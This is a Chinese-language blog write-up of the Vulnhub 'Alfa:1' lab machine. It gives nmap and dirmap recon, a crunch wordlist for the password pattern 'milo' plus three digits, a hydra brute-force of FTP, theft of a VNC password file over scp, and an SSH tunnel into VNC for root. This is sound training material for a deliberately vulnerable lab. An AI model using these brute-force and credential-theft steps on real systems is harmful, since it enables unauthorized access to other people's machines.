Vulnhub_Alfa:1

Vulnhub下载地址:
链接:https://pan.baidu.com/s/1GROpdsN9quDjAyBhTnHfIw
提取码:8xw7

0x01环境介绍

攻击机:192.168.10.128
靶机:192.168.10.134

0x02信息收集

先用nmap进行信息收集

nmap -A -T4 -v -p- 192.168.10.134

image
有ssh、ftp、http服务的端口,重点关注这几个

python3 dirmap.py -i http://192.168.10.134 -lcf

image
很显眼的robots.txt文件
底下有个brainfuck
image

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>+++++++++++++++++.>>---.+++++++++++.------.-----.<<--.>>++++++++++++++++++.++.-----..-.+++.++.

解码地址:https://www.splitbrain.org/services/ook%E2%80%8B (当然还有其他的,能用就行)

0x03 检测

http://192.168.10.134/alfa-support

image
大致的意思就是,他忘了密码,密码是他的宠物狗的名字加上后面三位数
利用ftp访问一下有啥东西,匿名登陆,我直接用Kali的文件输 ftp://192.168.10.134这应该是他宠物狗的名字
image

image

crunch 7 7 -t milo%%% -o 123.txt (生成最高7位 最低7位 % 代表数字 输出到123.txt)

image

0x04 利用

hydra -l thomas -P 123.txt -v -f 192.169.10.134 ftp

image

利用ssh登陆 ssh -p 65111 thomas@192.168.10.134

image
查看有个user.txt
image
看了下提权啥的,没啥思路,看下端口吧,5901端口是vnc端口(远程桌面)
image

scp -P 65111 thomas@192.168.10.134:/home/thomas/.remote_secret ./
-P 是端口的意思 将192.168.10.134的thomas目录下的/home/thomas.remote_secret 复制到当前目录下./
image
ssh搭建隧道
ssh -p 65111 -L 5901:localhost:5901 thomas@192.168.10.1334

image

vncviewer -passwd .remote_secret localhost:5901
利用vncviewer登陆自己的5901端口,密码是.remote_secret里的内容
image
获得flag,管理员权限
image

0x05 总结(个人观点,仅供参考)

1、nmap有多种用法,具体还是得看个人习惯或者说哪个好用,像65111端口,我用nmap -sV -O 192.168.10.134是检测不到的
2、brainfuck解密,得上网搜,有时间一定写个脚本,去收集特征,下次遇到直接利用脚本进行判断
3、scp的使用,参考https://www.runoob.com/linux/linux-comm-scp.html
4、ssh搭建隧道,参考https://mp.weixin.qq.com/s/JR9tfIjewLR6cbHNcfA3Ew
5、vnc,是linux系统里的远程桌面,默认端口是5901,vncviewer的使用方法还在找,大概就是vncviewer 端口 (-passwd .remote_secret 如果有密码的话)

posted @ 2021-07-17 12:35  zhbkai  阅读(158)  评论(0编辑  收藏  举报